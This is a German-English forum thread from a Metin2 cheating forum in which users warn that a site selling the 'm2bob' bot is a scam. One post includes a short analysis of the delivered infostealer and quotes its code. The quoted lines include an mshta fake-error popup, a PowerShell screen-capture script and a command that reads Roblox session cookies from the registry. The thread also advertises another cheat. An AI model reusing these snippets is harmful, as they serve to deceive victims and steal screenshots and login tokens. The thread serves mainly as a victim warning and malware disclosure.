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Discussion on m2bob? within the Metin2 Hacks, Bots, Cheats, Exploits & Macros forum part of the Metin2 category.
08/03/2024, 21:06
elite*gold: 0
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08/03/2024, 22:51
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habe die selbe frage.
ich habe bis jetzt m2bob nicht gekauft , aber würde gerne wissen ob m2bob wieder funktioniert
08/03/2024, 23:25
elite*gold: 5
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Originally Posted by kakikaki1
Is this legit?
m2 bob .shop
they seem to be claiming that its the oirignal bob, I bought it a day ago, got an email with an "updater" and launcher, after I start it it says unsupported windows blabla, then BSOD, can't remove it with malwarebytes &kasperksy, on their dc I got insta banned after asking for some help, I feel like I got scammed lmao
Before buying something read everywhere about it. Obviously is a scam, they offer you something that doesn’t work so like that you can’t dispute an refund because they gived you something.
Originally Posted by Lukako215
habe die selbe frage.
ich habe bis jetzt m2bob nicht gekauft , aber würde gerne wissen ob m2bob wieder funktioniert
Don’t fall for this. Instead, you can try Xana. We offer support for GF and others private servers.
08/04/2024, 01:07
elite*gold: 0
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Originally Posted by kakikaki1
Is this legit?
m2 bob .shop
they seem to be claiming that its the oirignal bob, I bought it a day ago, got an email with an "updater" and launcher, after I start it it says unsupported windows blabla, then BSOD, can't remove it with malwarebytes &kasperksy, on their dc I got insta banned after asking for some help, I feel like I got scammed lmao
Dont buy this (m2bob . shop) just yesterday i got scammed... First you send 20€, then they write you back that their PayPal is freezed and u should ask for refund (just to seem legit) and send another 20€ to another PayPal (with +15 bonus days)... So they try to scam you for another 20€... Even if u pay another 20€ they will send you "BOT", which is KEYLOGGER (program that sends them what you write on your keyboard). So they try to scam you 3 times in row... These people are human rats
08/04/2024, 10:32
elite*gold: 0
Join Date: Oct 2016
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Hello everyone!
Did a bit of a research.
it's basically a Readlinestealer, and some other noname grabbers, stealers. when you open the "updater" it downloads m2.exe metin2.exe to temp files from a chinese host, opens them, and those download redline configs, then scan registry, pc name, installed apps, browser extensions, steal the pw's, userdatas.
Bob.exe same thing, but it connects to a telegram api, then sends your infos there.
Its a ****** *** py2exe.
The fake error msg comes from here : mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Unsupported WINDOWS Version or outdated CLIENT files. ERRORCODE 9042', 0, 'Unsupported Version', 0+16);close()""
$source = @" using System; using System.Collections.Generic; using System.Drawing; using System.Windows.Forms; public class Screenshot { public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; } } "@ Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms $screenshots = [Screenshot]::CaptureScreens() for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose() })
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.co m -Name .ROBLOSECURITY" (PID: 6504)
08/04/2024, 11:43
elite*gold: 0
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SCAM, fake account, if you write some words like SCAM, will be muted.
08/04/2024, 16:21
King of Hell
elite*gold: 1222
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First of all, this is non Question area. Second of all m2bob is dead.
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